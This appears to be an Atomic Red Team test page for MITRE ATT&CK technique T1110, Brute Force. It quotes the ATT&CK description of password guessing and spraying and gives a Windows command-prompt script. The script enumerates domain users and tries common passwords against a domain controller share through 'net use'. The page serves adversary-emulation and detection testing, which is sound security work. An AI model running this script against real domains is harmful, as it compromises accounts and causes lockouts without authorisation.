---
title: T1110 Brute Force
published: true
---
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110)

<blockquote>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
<br/>
<br/>  
<a href="https://attack.mitre.org/techniques/T1003">Credential Dumping</a> is used to obtain password hashes, this may only get an adversary so far when <a href="https://attack.mitre.org/techniques/T1075">Pass the Hash</a> is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
<br/>
<br/>  
Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
<br/>
<br/>  
A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
<br/>
<br/>  
Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
<br/>
  
- SSH (22/TCP)<br/>
- Telnet (23/TCP)<br/>
- FTP (21/TCP)<br/>
- NetBIOS / SMB / Samba (139/TCP & 445/TCP)<br/>
- LDAP (389/TCP)<br/>
- Kerberos (88/TCP)<br/>
- RDP / Terminal Services (3389/TCP)<br/>
- HTTP/HTTP Management Services (80/TCP & 443/TCP)<br/>
- MSSQL (1433/TCP)<br/>
- Oracle (1521/TCP)<br/>
- MySQL (3306/TCP)<br/>
- VNC (5900/TCP)<br/>
<br/>

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</blockquote>

## Atomic Tests

- Atomic Test #1 - Brute Force Credentials

<br/>

## Atomic Test #1 - Brute Force Credentials
Creates username and password files then attempts to brute force on remote host

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value | 
|:------:|:-------------:|:------:|:---------------:|
| input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
| input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt|
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|

#### Run it with `command_prompt`!

```
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
```
